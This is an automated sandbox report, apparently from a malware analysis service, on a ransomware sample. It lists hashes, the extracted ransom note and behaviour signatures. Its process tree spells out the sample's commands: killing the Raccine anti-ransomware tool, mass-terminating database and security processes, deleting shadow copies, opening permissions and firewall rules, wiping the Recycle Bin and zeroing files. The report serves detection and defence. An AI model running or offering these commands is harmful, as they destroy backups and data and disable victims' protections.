Analysis

  • max time kernel
    113s
  • max time network
    166s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
  • submitted
    24/09/2022, 09:40

General

  • Target

    HEUR-Trojan-Ransom.MSIL.Encoder.gen-5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe

  • Size

    100KB

  • MD5

    7fdd3bf8886199e8336f95c88bcaa49a

  • SHA1

    77e2019093379de4d5de07dbcf5893831c9bb7ec

  • SHA256

    5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc

  • SHA512

    9d774eca21fb33f26991cf20f0f6a2f0bce56aa4cc3d17fd769e0bb767ca400cd5c8dd64bb62db23bf5bc112b91b1a26db7bf2f9d85993cb990be5113e527a40

  • SSDEEP

    1536:1zmSA404oATJVPHEMXMxa6CO3/k/hdXVyczH+95DfFFjfuEnm:1zxEYsZaLhdlo95DfFFjfuCm

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note
All your files have been encrypted due to a security problem with your PC.
If you want to restore them, write us to the e-mail [email protected]
or: [email protected] (Backup mail)
Send us this file RESTORE_FILES_INFO
=================================================================================================================
Free decryption as a guarantee
Before paying, you can send 1-2 files for free decryption.
File format: txt doc pdf jpeg jpg gif png bmp
Total file size should not exceed 2 MB (without archive)
======================================================
You can buy Bitcoins here: https://localbitcoins.com
Or use the search how to buy Bitcoins in your country
=================================================================================================================
IMPORTANT!!!
Remember that your files are encrypted and only WE can recover them!
Do not try to recover yourself, as well as on third-party resources, you will lose your files and money forever!
=================================================================================================================
Key Identifier:
PC Hardware ID: 2C4BFA22

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Ransom Note
All your files have been encrypted due to a security problem with your PC.
If you want to restore them, write us to the e-mail [email protected]
or: [email protected] (Backup mail)
Send us this file RESTORE_FILES_INFO
=================================================================================================================
Free decryption as a guarantee
Before paying, you can send 1-2 files for free decryption.
File format: txt doc pdf jpeg jpg gif png bmp
Total file size should not exceed 2 MB (without archive)
======================================================
You can buy Bitcoins here: https://localbitcoins.com
Or use the search how to buy Bitcoins in your country
=================================================================================================================
IMPORTANT!!!
Remember that your files are encrypted and only WE can recover them!
Do not try to recover yourself, as well as on third-party resources, you will lose your files and money forever!
=================================================================================================================
Key Identifier:
Number of files that were processed is: 1067
PC Hardware ID: 2C4BFA22

Signatures

  • Modifies Windows Firewall 1 TTPs 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Drops file in Program Files directory 12 IoCs
  • Drops file in Windows directory 10 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 48 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Encoder.gen-5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe
    "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Encoder.gen-5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Modifies WinLogon
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:5080
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2120
    • C:\Windows\SYSTEM32\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:308
      • C:\Windows\SYSTEM32\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:4436
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:3628
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config FDResPub start= auto
          2⤵
          • Launches sc.exe
          PID:1772
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config Dnscache start= auto
          2⤵
          • Launches sc.exe
          PID:4864
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SQLTELEMETRY start= disabled
          2⤵
          • Launches sc.exe
          PID:4536
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SSDPSRV start= auto
          2⤵
          • Launches sc.exe
          PID:4372
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
          2⤵
          • Launches sc.exe
          PID:680
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SstpSvc start= disabled
          2⤵
          • Launches sc.exe
          PID:752
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config upnphost start= auto
          2⤵
          • Launches sc.exe
          PID:1592
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SQLWriter start= disabled
          2⤵
          • Launches sc.exe
          PID:2704
        • C:\Windows\SYSTEM32\netsh.exe
          "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
          2⤵
          • Modifies Windows Firewall
          PID:3040
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mspub.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:400
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM synctime.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1556
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mspub.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4960
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mydesktopqos.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3332
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mysqld.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3796
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM Ntrtscan.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2248
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM sqbcoreservice.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1248
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mydesktopservice.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4452
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM isqlplussvc.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1456
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM firefoxconfig.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2236
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM onenote.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:540
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM tbirdconfig.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1896
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM encsvc.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2216
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM agntsvc.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2744
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM PccNTMon.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1644
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM excel.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4672
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM dbeng50.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4036
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM thebat.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:220
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM thebat64.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3960
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM CNTAoSMgr.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:664
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM msaccess.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3640
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM outlook.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4968
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM sqlwriter.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4504
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM steam.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3720
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM ocomm.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3644
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM tmlisten.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4048
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" IM thunderbird.exe /F
          2⤵
          • Kills process with taskkill
          PID:4892
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM wordpad.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3356
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM infopath.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:892
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM dbsnmp.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2060
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mysqld-opt.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1444
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM msftesql.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:704
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mbamtray.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2124
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM xfssvccon.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2956
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM powerpnt.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4360
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM ocautoupds.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5084
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM zoolz.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4588
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mydesktopqos.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1496
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM ocssd.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1556
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM visio.exe /F
          2⤵
          • Kills process with taskkill
          PID:3484
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM oracle.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:216
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mydesktopservice.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2416
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM sqlagent.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4032
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM winword.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3684
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM sqlbrowser.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3864
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM mysqld-nt.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3612
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /IM sqlservr.exe /F
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3368
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3676
        • C:\Windows\SYSTEM32\icacls.exe
          "icacls" "C:*" /grant Everyone:F /T /C /Q
          2⤵
          • Modifies file permissions
          PID:1640
        • C:\Windows\SYSTEM32\icacls.exe
          "icacls" "D:*" /grant Everyone:F /T /C /Q
          2⤵
          • Modifies file permissions
          PID:2392
        • C:\Windows\SYSTEM32\icacls.exe
          "icacls" "Z:*" /grant Everyone:F /T /C /Q
          2⤵
          • Modifies file permissions
          PID:1964
        • C:\Windows\SYSTEM32\netsh.exe
          "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
          2⤵
          • Modifies Windows Firewall
          PID:1536
        • C:\Windows\SYSTEM32\arp.exe
          "arp" -a
          2⤵
            PID:3248
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
            2⤵
              PID:1000
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c rd /s /q D:\\$Recycle.bin
              2⤵
                PID:1324
              • C:\Windows\SYSTEM32\netsh.exe
                "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                2⤵
                • Modifies Windows Firewall
                PID:3412
              • C:\Windows\SYSTEM32\netsh.exe
                "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
                2⤵
                • Modifies Windows Firewall
                PID:3128
              • C:\Windows\System32\notepad.exe
                "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
                2⤵
                • Opens file in notepad (likely ransom note)
                PID:4984
              • C:\Windows\SYSTEM32\cmd.exe
                "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                2⤵
                  PID:3936
                  • C:\Windows\system32\PING.EXE
                    ping 127.0.0.7 -n 3
                    3⤵
                    • Runs ping.exe
                    PID:1180
                  • C:\Windows\system32\fsutil.exe
                    fsutil file setZeroData offset=0 length=524288 “%s”
                    3⤵
                      PID:4032
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Encoder.gen-5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe
                    2⤵
                      PID:2392
                      • C:\Windows\system32\choice.exe
                        choice /C Y /N /D Y /T 3
                        3⤵
                          PID:4612

Network

MITRE ATT&CK Enterprise v6

Downloads

                    • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

                      Filesize

                      1KB

                      MD5

                      f3dc4193bab2599f08b987d977d37c1f

                      SHA1

                      75b9843e0a47f8c6e9c9f1993cf0673d5d5b9222

                      SHA256

                      841b5221834f6aa5f5e37625da413af2d603adf51d6fca8e724b0ca630831e67

                      SHA512

                      f016c226181fed76e76c4c845e5d2bd2e4b68db41385ca2d3cff215928ea6c6f7575051df7b1a9c15aabc168389925b10e617c919cab8cd2d31347e979510b6d

                    • memory/3676-200-0x00007FFBA9C30000-0x00007FFBAA6F1000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/3676-199-0x0000027774CE0000-0x0000027774D02000-memory.dmp

                      Filesize

                      136KB

                    • memory/5080-134-0x00007FFBA9C30000-0x00007FFBAA6F1000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/5080-132-0x0000000000580000-0x00000000005A0000-memory.dmp

                      Filesize

                      128KB

                    • memory/5080-133-0x00007FFBA9C30000-0x00007FFBAA6F1000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/5080-202-0x00007FFBA9C30000-0x00007FFBAA6F1000-memory.dmp

                      Filesize

                      10.8MB